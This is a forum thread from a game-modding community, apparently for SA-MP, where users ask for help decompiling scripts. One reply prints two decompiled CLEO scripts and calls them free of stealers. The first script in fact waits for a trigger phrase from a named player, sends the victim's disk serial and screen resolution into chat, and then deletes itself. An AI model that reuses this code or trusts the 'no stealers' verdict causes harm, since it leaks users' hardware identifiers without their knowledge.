Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,758
5,730
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:

MaksQ

Известный
967
817
Код открыт, стиллеров нету.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP

:NONAME_2
wait 0
   SAMP.Available
else_jump @NONAME_2
alloc 16@ 560
alloc 3@ 560
alloc 4@ 560

:NONAME_39
wait 0
SAMP.GetChatString(99, 16@, 0, 0, 0)
if and
0C29: 29@ = stristr string1 16@ string2 "Bounty_Bomjiano:"
0C29: 29@ = stristr string1 16@ string2 "[G]"
0C29: 29@ = stristr string1 16@ string2 "get"
else_jump @NONAME_205
call @NONAME_212 0 0@
SAMP.GetScreenResolution(3@, 4@)
alloc 1@ 16
format 1@ "%X" 0@
say "%s %i %i" 1@ 3@ 4@
0B00: delete_file "CLEO\checker.cs" // IF and SET
0BDE: pause_thread 0

:NONAME_205
jump @NONAME_39

:NONAME_212
0AA2: 25@ = load_library "Kernel32.DLL" // IF and SET
0AA4: 26@ = get_proc_address "GetVolumeInformationA" library 25@ // IF and SET
0AC7: 27@ = var 27@ offset
0AA7: call_function 26@ num_params 8 pop 0 0 0 0 0 27@ 0 0 0 28@
0AA3: free_library 25@
ret 1 27@
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP

:RATE_2
wait 400
   SAMP.Available
jf @RATE_2
thread "rate"
log "{ff0000}SendRate {ffffff}by {ff0000}luckyFOX {ffffff}for {ff0000}BlastHack"
0B34: samp register_client_command "sendrate" to_label @RATE_124
0BDE: pause_thread 0

:RATE_124
   SAMP.IsCommandTyped(0@)
0AD4: 1@ = scan_string 0@ format "%d %d" 2@ 3@
if
  1@ > 1
jf @RATE_357
SAMP.SetSendrate(2@) = 3@
if
  2@ == 1
jf @RATE_236
chatmsg "SendRate OnFoot - {ff0000}%d" 16777215 3@

:RATE_236
if
  2@ == 2
jf @RATE_294
chatmsg "SendRate InCar - {ff0000}%d" 16777215 3@

:RATE_294
if
  2@ == 3
jf @RATE_350
chatmsg "SendRate AIM - {ff0000}%d" 16777215 3@

:RATE_350
goto @RATE_472

:RATE_357
chatmsg "/sendrate [type] [delay]: {ff0000}OnFoot {ffffff}= 1; {ff0000}InCar {ffffff}= 2; {ff0000}AIM {ffffff}= 3:" 16777215

:RATE_472
SAMP.CmdRet
 
  • Влюблен
  • Нравится
Реакции: Docker, Renty и Salisburry

allan_wasd

Новичок
3
0
Hello, can anybody decrypt me this, or translate for me pls? in english
 

Вложения

  • BulletTrack.lua
    17.3 KB · Просмотры: 5